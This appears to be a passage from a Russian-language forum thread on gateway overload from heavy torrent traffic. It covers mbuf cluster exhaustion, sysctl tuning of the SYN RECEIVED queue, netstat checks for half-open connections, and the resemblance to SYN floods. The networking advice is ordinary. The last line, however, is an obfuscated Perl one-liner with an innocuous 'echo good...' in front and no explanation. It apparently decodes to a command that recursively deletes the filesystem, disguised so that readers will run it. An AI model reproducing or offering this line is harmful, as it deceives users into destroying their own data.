Опять же на примере торрента, переполнение именно по mbuf кластер проходит и регулируется на низком уровне через sysctl - не говорил бы, если бы не сталкивался )))). Кол-во соединений смотрим netstat -na, наблюдаем огромное кол-во соединений, в том числе большое кол-во полуоткрытых - SYN_RECV. То что происходит выше, в приложении, фильтра приложений и т.д. - это мало интересует. По полуоткрытым, можно попробовать увеличить очереди полуоткрытых соединений (в состоянии SYN RECEIVED) и уменьшить, период времени хранения незавершенных подключений в состоянии SYN RECEIVED. Повторюсь, проблема именно при большом кол-ве соединений, какое приложение их вызывает и прочее, не важно. На данный момент рекорцмен - это торрент, как не крути
.
---
>>где зависоны то на веб сервере или на гейте
не отвечает он по любому, хоть к нему подрубись по WEB или фтп или как угодно, хоть сам попытайся выйти в инет через NAT или Proxy (пофиг), канал занят из 2Мбит на 1Мбит максимум 1.5Мбит.
---
Есть такое понятие, как SYN атака, при этом как раз наблюдается большое кол-во соединений, большое кол-во SYN RECEIVED соединений. Дело в том, что нынешний софт запросто при своей работе сделает то, что раньше называлось бы атакой ))))))))))).
echo "good..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'